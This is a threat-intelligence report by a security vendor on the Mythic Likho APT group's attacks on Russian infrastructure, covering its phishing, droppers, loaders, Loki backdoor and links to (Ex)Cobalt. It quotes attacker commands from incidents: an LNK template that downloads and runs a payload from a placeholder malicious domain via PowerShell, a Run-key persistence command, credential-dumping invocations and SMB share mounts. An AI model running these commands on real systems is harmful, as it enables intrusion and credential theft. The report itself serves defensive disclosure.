PT Expert Security Center

Keep your finger on Pulse.
Mythic Likho cyberattacks against Russia's critical information infrastructure

Authors:

Viktor Kazakov

Viktor Kazakov

Lead Cyberthreat Intelligence Specialist, Positive Technologies Expert Security Center

Maxim Shamanov

Maxim Shamanov

Junior Specialist of the Sophisticated Threat Research Group, Positive Technologies Expert Security Center

Key takeaways

What sets Mythic Likho apart:

  • A sprawling infrastructure for hosting, delivering, and controlling malicious tools—from compromised websites of Russian government agencies, businesses, and media outlets to custom domains designed to impersonate the targets' business partners and Russian cloud storage services
  • Sophisticated social engineering underpinning every attack, with carefully crafted sender identities: impersonating compromised payload-hosting websites and real employees, mimicking brand styles, and drawing victims into conversations backed by well-prepared cover stories
  • A large and rapidly evolving arsenal of custom offensive tools: the HuLoader and ReflectPulse loaders and the Loki backdoor
  • Collaboration with the (Ex)Cobalt group

Introduction

The first Mythic Likho cyberattacks on Russian organizations using the Loki backdoor were discovered in September 2024. In February 2025, the Merlin loader underwent in-depth analysis; in November, a new version of the Loki backdoor was documented.

In this research, we combined the expertise of the Threat Intelligence and Incident Response teams within the Positive Technologies Expert Security Center (PT ESC), linked previously scattered traces of Mythic Likho operations into a unified cluster, and carried out a comprehensive research. Our goal is to build a complete picture of the group's tactics, techniques, and offensive tooling.

Cyber kill chain

Reconnaissance

Mythic Likho operators thoroughly research their targets: the organization's industry, geographic location, business partners, employee email addresses, and roles. This intelligence feeds into attack vector selection, phishing email themes, the cover story and approach for communicating with employees, and infrastructure preparation.

Resource Development

To host malicious tools and run C2 infrastructure, Mythic Likho:

  • Rents virtual servers.
  • Registers domains that impersonate Russian cloud storage services, match the victim's industry, or mimic legitimate organizations whose email has been compromised.
  • Creates accounts on cloud storage platforms.
  • Compromises websites of Russian organizations.

To send victims links to malicious files, the group:

  • Registers email addresses on Russian services, impersonating legitimate organizations whose websites have been compromised.
  • Runs custom SMTP servers on domains designed to look like Russian email providers.
  • Gains access to email accounts at Russian organizations, then uses them for phishing campaigns and direct communication with victims.

The group combines these infrastructure elements: one component sits within a compromised legitimate network perimeter, while the other either impersonates the compromised organization, a cloud storage service, or a general-purpose platform—or is tailored to the victim's industry, the phishing theme, and the cover story to communicate with employees.

Cloud storage impersonation: email from cloudmaill[.]ru with a download link for HuLoader from the domain ilcloud[.]ru

The email accounts used to communicate with victims are registered using Russian mobile numbers and configured to mimic the corporate accounts of employees from the compromised organizations. To appear authentic, these profiles use real employee details and favicons scraped from the breached official websites.

Profile impersonating a compromised news agency website conyaining HuLoader, registered with a Russian mobile number
Cloud storage account hosting the HuLoader loader, registered using real details of an employee at a compromised news agency

Mythic Likho domains fall into several clusters based on the victim's industry or the impersonation theme. All domains in the table below are phishing domains.

CategoryDomains
Cloud storage servicesilcloud[.]ru
info-cloud[.]ru
cloudmaill[.]ru
cloudrc[.]ru
Industrial useelectropriborzavod[.]ru
npo-iskra[.]ru
gkrzn[.]ru
Government servicesgosuslugi-help[.]ru
gosinfobot[.]ru
gosuslugi-moskva[.]ru
моя-декларация[.]рф
Telecom operatorstelecomz[.]ru
nsitelecom[.]ru
arctelecom[.]ru
Legal servicesyuristconsultant[.]ru
consultantl[.]ru
Retail companiesshopdns[.]ru
dns-shop-client[.]ru
Mass mediavesti-news[.]ru
Softwarewinrar64[.]ru

In live attacks, the group typically uses third-level subdomains, which follow their own impersonation and segmentation patterns:

CategorySubdomain
Cloud storage servicesdrive
disk
files
cloud
document
docs
ftp
Emailmail
pop3
pop
smtp
Technical supportforum
help
Test infrastructuretest
Search engineyandex
ya
APIapi

In some cases, the group has re-registered and reused domains that previously belonged to targeted organizations.

C2 domains that receive data from infected hosts and serve the Loki backdoor share a consistent set of GET/POST endpoints:

  • .ru/data? q=
  • .ru/data_query? q=
  • .ru/index? data=
  • .ru/meta

Mythic Likho registers all malicious domains through the Russian registrar Reg.Ru, rigorously maintaining the anonymity of its server infrastructure and concealing C2 IP addresses behind Cloudflare.

The one exception is the ilcloud[.]ru domain. At the time it was used in attacks, its subdomains were delegated to servers in the Netherlands on the Aeza International and SIA VEESP networks. In late January 2026, they were observed on the Russian server 45.144.67[.]86 on the FirstByte network.

DNS infrastructure of ilcloud[.]ru

Network fingerprints on this server suggest it may be running the Nessus vulnerability scanner, the Traefik Proxy web server, and Pangolin—a WireGuard traffic tunneling platform released in January 2025.

Nessus and Traefik Proxy network fingerprints
Pangolin authentication web interface

Updated DNS records for a previously identified C2 domain, combined with an active command-and-control server running the described configuration and software, indicate that Mythic Likho is actively preparing for new attacks.

Mythic Likho's offensive toolkit includes:

  • Custom malware:
    • HuLoader and ReflectPulse loaders
    • Loki backdoor
  • Commercial and open-source malware:
    • Merlin
    • LockBit
    • SharpHound
  • Commercial and open-source tools:
    • XenArmor Password Recovery
    • Rсlone
    • Ligolo-ng
    • Nmap
    • PsExec
    • Mimikatz
    • DcomExec
    • Impacket
    • Socat
    • PuTTY

For delivery, payloads are packaged in ISO files and RAR archives containing SCR or LNK first-stage loaders, alongside PDF and JPG decoy files: forged official letters from agencies and organizations, contracts, receipts, invoices, photographs, and resumes. To blend in with the decoys, malware uses double extensions and swapped icons.

RAR archive with double-extension LNK loaders disguised as PDF documents
RAR archive with SCR files using JPG and PDF icons

Prepared payloads are hosted on compromised legitimate websites, phishing domains, and cloud storage platforms.

Initial Access
Execution
Defense Evasion

Mythic Likho launches phishing campaigns targeting corporate email addresses at the target organization. Emails contain links to malicious packages. Malicious containers have never been found in the email body during the group's attacks. The first phishing email does not always carry a malicious link; it may arrive later, once trust has been established with the victim.

Initial phishing email with no malicious attachments, impersonating a media outlet, designed to build trust with the victim
Follow-up email with the HuLoader download link from a compromised news agency website

If the victim reports being unable to download the payload (for example, due to antivirus blocking), the group redirects them to alternative malicious resources through continued correspondence.

Email with the HuLoader download link from a cloud storage service

Opening the files triggers downloads from C2 domains and reflective execution of HuLoader, Merlin, or ReflectPulse on the target system. These loaders unpack the final payload—the Loki backdoor (detailed tool analysis is provided in the "Tool analysis" section).

Opening ReflectPulse and decoy in PT Sandbox
Opening ReflectPulse and decoy in PT Sandbox

In the earliest Mythic Likho attacks, observed between May and July 2024, SCR files inside RAR archives were used to initialize loaders and backdoors. The group later shifted to LNK loaders that download subsequent stages from compromised legitimate websites or malicious domains.

All identified LNK loaders use commands following this pattern:
 

/v:on /c "set u=https://192.168.1.1/[FILENAME] && set u=!u:192.168.1.1=[HACKED_OR_MALICIOUS_DOMAIN]! && powershell -c "$ProgressPreference='SilentlyContinue' ;iwr -Uri $env:u -OutFile $env:TEMP\[FILENAME];conhost.exe $env:TEMP\[FILENAME]"


A hallmark of Mythic Likho's loaders is how they disguise IP addresses in URLs as local addresses, then dynamically swap them with real C2 domains pulled from an environment variable in the final PowerShell command at runtime. This relies on the /v: on, flag, which enables delayed environment variable expansion. This technique evades security tools that lack dynamic file analysis in a virtual environment. In some attacks, the local IP address in the LNK command was further obfuscated using escape characters.

LNK loader for the Merlin agent in PT Fusion processing

Several incident investigations revealed that Mythic Likho gained initial network access using SSH access established by the (Ex)Cobalt group, which had already breached the infrastructure.

Follow-on persistence also involved launching HuLoader, unpacking the Loki backdoor, and naming its files after legitimate software:

  • C:\drivers\NVIDIAControlPanel.exe
  • C:\Temp\yandexupdate.exe
  • C:\Temp\Telegram.exe
  • C:\Temp\chrome.exe

Mythic Likho also disables antivirus software on compromised hosts to avoid detection.

Persistence

After gaining a foothold in the target network, Mythic Likho ensures the Loki backdoor starts automatically every time the infected host is powered on by modifying the Windows registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run using the reg add: command:
 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Yandex update service /t REG_SZ /d C:\\drivers\YandexUpdate.exe


On the infected host, a new local OS user is created net user and net accounts, and an SSH key file is created in the .ssh directory to enable remote SSH access.

Network tunnels into the compromised network are set up using the publicly available tools Ligolo-ng, PuTTY, and Socat. In 2026, the group is expected to use WireGuard tunnels to forward ports from internal compromised hosts to external Pangolin C2 servers masquerading as legitimate Russian services.

Command and Control

Using the Loki backdoor or SFTP connections secured with asymmetric encryption, as well as network tunnels, Mythic Likho downloads additional tools onto the infected host from outside the network:

  • LockBit
  • SharpHound
  • XenArmor Password Recovery
  • Rclone
  • Nmap
  • PsExec
  • Mimikatz
  • Impacket

These tools will be used in subsequent stages of a cyberattack.

Privilege Escalation
Credential Access

On compromised hosts, Mythic Likho runs Mimikatz and XenArmor Password Recovery Pro to extract credentials, including privileged accounts, from the OS and file system.

Commands for running XenArmor Password Recovery Pro observed during incident investigations:
 

xen.exe -a out.html
xen.exe -a C:\\drivers\\out.html
xen.exe -a i.html
C:\\drivers\\xen.exe -a i.html
C:\\drivers\\xen.exe -a i.html
XenAllPasswordPro.exe -a asd.html
C:\\drivers\\xen.exe -a i.html
C:\\drivers\\update\\XenAllPasswordPro.exe -a asd.html
C:\\drivers\\updates\\XenAllPasswordPro.exe -a C:\\Temp\\rep.html

Discovery

Using the Loki backdoor along with Windows and PowerShell commands, the group gathers information about the infected host:

  • OS and file system information
CommandInformation retrieved
systeminfoSystem and hardware configuration: OS version, RAM, CPU, and so on
Get-ProcessList of running processes
Get-VolumeDisk volume details: drive letters, labels, file systems, size, and free space
Get-PSDriveList of available PowerShell drives and their properties
  • Local and domain user accounts, password policies
CommandInformation retrieved
whoamiCurrent user name and domain
Get-ADUser -Filter *Active Directory users
net userActive Directory users
net accountsWindows password and account policy settings
Get-ADDefaultDomainPasswordPolicyDefault password policy for a specific Active Directory domain
Get-WssPasswordPolicyWindows Server Essentials password policy

Mythic Likho also runs SharpHound on infected hosts to collect information about Active Directory users.

  • File system structure and contents
CommandInformation / action
pwdFull path of the current working directory
lsList of files and directories in the current directory
dir [PATH]List of files and subdirectories at the specified path
tree [PATH] > [FILE_PATH]Directory tree for the specified path; the output is saved to a file
-C "[Console]::OutputEncoding = New-Object System.Text.UTF8Encoding; (Get-ChildItem -Path '[PATH]' -Recurse | Measure-Object -Property Length -Sum | ForEach-Object {[math]::Round($_.Sum / 1MB, 2) })"Recursive file enumeration in the specified folder and calculation of their total size
(gci O:\1C_InfoBase (352) | measure Length -s).Sum / 1MbTotal size of all files in the 1 °C database directory, in megabytes
  • Network configuration information
CommandInformation retrieved
arp -aARP table mapping IP addresses to MAC addresses
netstat -atnNetwork connection statistics
ipconfigDevice IP addresses configuration
Get-SMBShareList of available SMB shares
ping fsNetwork availability status of the fs host using ICMP echo requests
net viewList of hosts in the current domain or workgroup sharing resources

For network reconnaissance, the group runs Nmap on compromised hosts.

Lateral Movement

When moving laterally within the compromised infrastructure, Mythic Likho uses stolen local credentials along with the PsExec and DcomExec utilities from the Impacket toolkit to execute remote commands on other hosts.

Malicious tools are distributed and launched across the network by mounting local and remote SMB shares containing the HuLoader, Merlin, and ReflectPulse loaders using net use and New-PSDrive commands.

Commands used to mount SMB shares, observed on infected hosts during incident investigations:
 

net use Z: \\5.255.116.34\doc.txt
net use Z: \\192.168.0.240\fs
net use X: \\87.251.66.8\test.jpg
New-PSDrive -Name Z -PSProvider FileSystem -Root \\192.168.0.240\fs -Persist

Data collection and exfiltration

Mythic Likho uses native utilities to create local copies of databases found across the compromised network, archives data found in local and network shares of infected hosts using the PowerShell Compress-Archive command, and then exfiltrates the data either to cloud storage via Rclone or to C2 servers via the Loki backdoor.

Impact

In the final stage of the attack, Mythic Likho encrypts data on devices throughout the compromised network using LockBit ransomware, formats RAID arrays, removes backup and recovery tools, and uses the Loki backdoor to terminate various system processes. The group leaves instructions for communicating via qTox and recovering access to encrypted information on infected hosts in a Russian-language message in Notepad, typical of official LockBit RaaS affiliates.

Data decryption instructions

Analysis of tools

Since 2024, Mythic Likho has employed several payload delivery vectors, each more sophisticated than the last, as shown in the diagram below.

Evolution of delivery mechanisms and tools

The diagram illustrates the group's heavy reliance on droppers and complex delivery chains for the final payload. In all cases, the dropper architecture stays consistent while the payload is changed.

Two components of the delivery chain stand out from an architectural perspective:

  • Stage 1 dropper extracting Stage 2 dropper and the decoy document (Dropper 1)
  • Stage 2 dropper launches the loader (Dropper 2)

Both tools are under active development. They are closely tied to the final payload, modular, and versatile.

Dropper 1

Although this dropper is used at an intermediate stage, its unusual structure and functionality caught our attention. We identified multiple versions of the dropper, confirming that it is regularly updated and maintained.

The sample used by the group in March 2025 contained a binary data block, split into two parts: a configuration block and the main payload. On launch, the dropper dynamically resolved function addresses using a modified, case-insensitive variant of the DJB2 hash algorithm with a modified constant.

The configuration block provided HTTP request parameters: User-Agent, C2 server address and port, endpoint, and request method. Using these values, the dropper built and sent a request to the C2 server, expecting a Base64-encoded key in return. After decoding, this key was used to extract the payload: first via XOR decryption, then DEFLATE decompression.

Dropper 1 configuration block

The resulting data was then interpreted as a structured container describing the next infection stage. This container held a single executable (Dropper 2), extraction path details, launch parameters, and, optionally, a list of additional processes to run with specified arguments.

During execution, the dropper extracted the PE file, determined where to save it (using either a full path or a temporary directory if only a filename was provided), wrote it to disk, and launched it with the supplied argument.

If the container structure included parameters for additional processes, the dropper processed them one by one, running each with its respective arguments. This logic most likely serves to open the decoy file, but could be used for other purposes. After each step, the dropper wiped its temporary buffers to cover its tracks and hinder analysis.

Dropper 1 resource structure

In the modified dropper version the group used in November 2025, C2 communication was removed: the embedded resource was unpacked without any decryption. At the same time, the resource structure was expanded: the dropper could now handle an arbitrary number of entries, each containing file data, a file system path, and process launch parameters.

Updated Dropper 1 resource structure

The updated version also introduced a unique heap data obfuscation technique, invoked multiple times both before and after resource extraction and unpacking. This mechanism allocates an array of 50,000 pointers, each backed by a 4 KB memory page, resulting in roughly 200 MB of memory allocated per function call.

Technique implementation

Notably, a dummy PE-like header is generated on one of the pages (at index 25,000), which includes MZ and PE signatures, standard header fields, as well as a deterministic 1 KB data block mimicking the contents of a binary file. Each allocated page then has its first byte zeroed out, after which its entire contents are overwritten with values derived from the page index. As a result, every page is fully overwritten, including the fake PE header.

Heap data obfuscation

Since the dropper calls this routine multiple times, total memory allocation can reach up to 1 GB. The heap flooding serves several purposes: it increases memory entropy, hinders process dump analysis, and conceals payload artifacts. Combined with the redesigned structure and the removal of C2 communication, this makes the new dropper version stealthier and more resilient.

Dropper 2

The executable saved in the previous step is the next-stage dropper, used for extracting and launching the final payload loader. Like its predecessor, it exists in multiple versions and contains a packed resource, a hallmark of this attack chain, capable of supporting multiple loaders and loader versions used by the attackers.

Dropper 2 resource structure

The second-stage dropper inherits the same architectural principles: it dynamically resolves function addresses using a custom DJB2 hash variant, unpacks the resource container, and processes it.

The key difference at this stage is that after extracting each entry, the dropper identifies its type (EntryType) and uses it to control reflective loading of the next stage.

Entry types

mainEntryTypeadditEntryTypeDestination
42The first and second additional blocks are processed: the first is interpreted as connection parameters and passed to the loaded DLL as an argument to the called function, while the second is processed by dummy handlers and then destroyed.
3-All additional sections are ignored; the DLL is loaded without arguments.
2-The first additional block is interpreted as connection parameters and passed to the loaded DLL as an argument.
1-The first additional block is read, processed by dummy handlers, and then destroyed.

Our analysis covered multiple versions of this tool, allowing us to trace its evolution. While the resource block format has remained unchanged, Mythic Likho's developers have steadily expanded the set of supported entry types and introduced anti-analysis mechanisms. One example is the heap obfuscation technique described above, which was absent in earlier versions of Dropper 2. Additionally, the presence of dummy handlers suggests groundwork for future capability expansion.

Loaders

The reflectively loaded DLL acts as a loader agent: it collects system information, sends it to the C2 server, and receives the final payload (the Loki backdoor) in return. All loader versions use AES for message encryption and are compatible with the Mythic and Havoc post-exploitation frameworks.

The message structure varies slightly between versions but has remained consistent since the second half of 2025, with the following fields:

  • Loader version (1.0, 2.0)
  • Unique 36-byte agent identifier
  • Number of adapters
  • Adapter IPv4 addresses
  • OS architecture (x86, x64, arm, arm64, or UNKNOWN)
  • OS version
  • Computer name
  • User name
  • Current process PID
  • Path to the current executable
  • Process integrity level

As with the droppers, Mythic Likho has widely used multiple loader variants since 2024, and we were able to trace their evolution as well.

HuLoader

HuLoader is the first tool in this family. Unlike later variants, it is a standalone executable delivered without the use of droppers.

The earliest version, discovered in 2024, was version 0.0.2. It was the only version that not only collected system information (using the checkin tag) but also requested commands for execution (using the get_tasking tag). Depending on the received command, one of the following actions was performed:

  • 0xD9E10DB1: run a Beacon Object File (BOF).
  • 0×9467C7F4: change the polling interval.
  • 0×07FAF78A: send a heartbeat message.

Another notable detail: this version is where the string "Terminating Loki… Remember, I'll be back!" first appears—later carried over to the Loki backdoor downloaded from the C2 server.

In later modifications, the group removed the built-in command system, splitting the loader and backdoor into two separate components and laying the groundwork for subsequent attacks.

Merlin

Merlin is an open-source post-exploitation tool written in Go, covered in detail in our colleagues' report. This loader retains the core functions established in HuLoader: collecting fixed system information and downloading the backdoor.

By May 2025, Mythic Likho was deploying the Merlin agent through the dropper chain. Notably, the extracted resource was of type 3 per the table above (loading without passing connection parameters as an argument).

ReflectPulse

ReflectPulse was the most heavily used tool by Mythic Likho across the majority of attacks observed in 2025. Over this period, we analyzed multiple versions of the tool, identifying key changes in its functionality.

Loader versions used between March and October 2025 were extracted from Dropper 2's resources and received connection parameters as a launch argument: the encryption key, a unique agent identifier, User-Agent, a list of endpoints, and the AES-encrypted C2 server address. The loader used this key both to decrypt the configuration string containing the C2 address and to encrypt and decrypt messages during C2 communication.

Configuration structure passed to the loader

In November of the same year, Mythic Likho used an updated version of ReflectPulse for the first time, which differed significantly from its predecessors. In addition to the configuration, Dropper 2 also passed a plaintext copy of the Loki backdoor to the loader. The configuration structure was also expanded.

Updated configuration structure passed to the loader

ReflectPulse uses a unified encryption format for both configuration data and C2 communication. Data is encrypted using AES-CBC, with integrity verified via HMAC-SHA-256.

The resulting ciphertext contains the initialization vector, encrypted data, and authentication code. Its structure is as follows:

Ciphertext structure

After receiving the configuration from Dropper 2, the loader extracts its parameters. If the agent module was passed in plaintext, the loader encrypts it using the format described above and stores it exclusively in encrypted form in memory until execution. ReflectPulse then initiates C2 communication using polling intervals extracted from the configuration.

If no agent module is included in the configuration, the loader sends the collected system information and waits for the encrypted agent module in the C2 server's response. When the agent module is present, ReflectPulse still sends system information but waits for a response authorizing payload decryption and execution.

The data transmission method is determined by a hardcoded value: ReflectPulse supports both GET and POST requests. The configuration provides two separate endpoints, one for each method, along with an HTTP request parameter used to carry the data sent to the C2 server.

Notably, the loader supports two operating modes, selected via a dedicated flag. In standard mode, configuration data is stored and transmitted in plaintext. In stealth mode, configuration parameters are stored and transmitted exclusively in encrypted form. ReflectPulse first decrypts them, then repacks each parameter by XOR-encrypting it with a unique key, hindering process memory dump analysis.

Loki backdoor

Regardless of the delivery method, once the C2 server responds, the encrypted payload resides in process memory. After decryption and successful authentication code verification, the agent reflectively loads the module and calls its exported function, passing previously extracted configuration data along with already-resolved function addresses required for further operation.

During initialization, Loki creates a startup message to be sent to the C2 server. This message contains the hardcoded magic value 01 00 01 00 00 00 and is encrypted using the same algorithm and key as the loader. The transmission method (GET or POST) is also hardcoded and independent of the configuration.

After receiving and successfully decrypting the C2 server's response, the backdoor processes it. A C2 response may contain multiple commands, which are then processed sequentially until all have been handled.

The updated Loki's functionality remains unchanged from its first version, as previously documented.

Commands supported by the backdoor

CommandDestination
0Terminate backdoor execution
1Update server communication interval
2Download a file from the C2 server to the target system
3Upload a file from the target system to the C2 server
4Launch a new process
5Load and execute code within a specified process
6Change the current working directory
7Forcefully terminate a specified process
8Execute Beacon Object File (BOF)
9View the current working directory
10Manage Windows access tokens and privileges
11Retrieve environment variables and their values

Command execution results are sent to the C2 server as structured messages. Successful execution is reported with status 0×04, while errors use 0×05. In addition to the status, messages include the fixed value 0×01 (likely a backdoor version identifier) and the executed command code.

Optionally, a command execution message may include additional fields such as the command subtype (indicating how the command was handled), an internal error code, and a LastError value. If the command succeeds, the message also includes execution result data where applicable.

Structure of messages generated by the backdoor

Threat landscape

Since Mythic Likho's operations focus on financial extortion, its victims are large, well-resourced organizations in the following sectors of the Russian economy:

  • Mechanical engineering
  • Mining
  • Manufacturing

Meanwhile, organizations whose infrastructure was compromised and used by the group for malware delivery belong to sectors that provide effective cover for social engineering and impersonation:

  • Government and public sector
  • Mass media
  • Retail

Artifacts

Link to (Ex)Cobalt

During 2025 incident investigations, the PT ESC team found that during the persistence phase in compromised networks, the attackers used Chisel to establish a network tunnel to 87.251.66[.]8, deployed the Megatsune rootkit, a proprietary tool from (Ex)Cobalt's arsenal, onto the target host, and added new users and SSH keys.

Days later, these SSH keys were used to log in and advance the attacks using the HuLoader and ReflectPulse loaders—proprietary tools from Mythic Likho's toolkit.

For further lateral movement within the compromised network, Mythic Likho mounted a remote SMB share containing these loaders onto the infected hosts. This share was hosted on 87.251.66[.]8, the same server previously used by the Megatsune operators for Chisel tunneling.

We believe these artifacts directly point to a link between (Ex)Cobalt and Mythic Likho. The two groups either conduct attacks in tandem, complementing each other's tools and techniques, or share proprietary malware.

During retrospective analysis of compromised networks, the PT ESC team also identified XDSpy activity. However, given the significant time gap of several months between the incidents, there is insufficient evidence to establish a connection between the groups.

OSINT investigation

While investigating incidents linked to Mythic Likho attacks, the PT ESC team discovered that during the data collection phase, the group uses an outdated 2020 version of XenArmor Password Recovery with a free trial license issued to onimaruslade@gmail[.]com.

XenArmor Password Recovery license file

The OSINT investigation led the threat intelligence team to social media accounts on foreign platforms registered to this email address. The accounts belong to a Canadian resident with interests in anime and German football. There is no evidence linking him to the cybercriminal underground. However, dark web records show their credentials for various foreign services and social media platforms have been exposed in database leaks; the same simple password was reused across all of them.

Accounts linked to onimaruslade@gmail[.]com: "ms" @onimaruslade is registered to this email; the older "marc" @onislade account follows it
Account of the onimaruslade@gmail[.]com owner

However, the following facts raise concerns:

  • No XenArmor account: the utility observed during the incident used a trial license, which only requires providing an email address. No full registration on the developer's website is needed.
  • Outdated XenArmor version: using a 2020 version in 2024–2025 attacks is illogical, since a current 2025 trial version is still freely available from the developer's website.

The discovered artifacts point to two possible scenarios:

  • The Canadian resident is a member of the Mythic Likho group or is indirectly linked to its operations, including the possibility of being used as an unwitting participant.
  • The tool copy circulates in the cybercriminal underground as a result of prior compromise of the individual's accounts or devices, whether through malware infection or password reuse across services.

Conclusion

For two years, PT ESC experts have consistently tracked sophisticated attacks by the Mythic Likho APT group targeting Russian critical infrastructure. Since its earliest attacks, the group has relied on carefully crafted social engineering, compromised legitimate infrastructure, and custom-built malware, steadily refining and expanding its capabilities.

Mythic Likho demonstrates strong technical expertise, maintains strict anonymity of its malicious infrastructure, and is in active contact and collaboration with other professional APT groups targeting Russia. Its members are most likely seasoned cybercriminal professionals with extensive attack experience and sufficient resources.

The Positive Technologies Expert Security Center expects Mythic Likho to remain a persistent threat to Russian critical infrastructure for the foreseeable future. Effective defense against such persistent, sophisticated cyberattacks requires comprehensive solutions that combine established detection expertise with current threat intelligence. PT ESC's Threat Intelligence team will continue to monitor the APT group's activity, promptly alert potential victims to planned cyberattacks, and provide unique threat intelligence to users of Positive Technologies products and the PT Fusion portal.

Recommendations

To defend against Mythic Likho's attacks, our recommendations are to:

  • Use licensed antivirus solutions with up-to-date, regularly refreshed signature databases.
  • Scan email attachments from untrusted or suspicious senders with antivirus tools. Be cautious if there's no prior correspondence; the sender isn't a known counterparty; the domain is unusual; or the message stresses urgency, especially while invoking government agencies, regulators, or supervisory bodies.
  • Do not open password-protected archives or embedded files without scanning them first.
  • Disable hiding of file extensions and verify actual extensions: don't open files whose icon doesn't match the real extension; don't open files with multiple dot-separated extensions at the end of the name.
  • Provide regular employee training and exercises on safe email use and resisting social engineering.

Indicators of compromise

File-based IoCs

Network IoCs

MITRE ATT&CK matrix

Positive Technologies product verdicts

PT Sandbox

YARA rules

Behavioral verdicts

PT NAD and PT NGFW

LOADER [PTsecurity] HuLoader sid: 10011864
TOOLS [PTsecurity] Mythic C2 Loki Agent sid: 10013028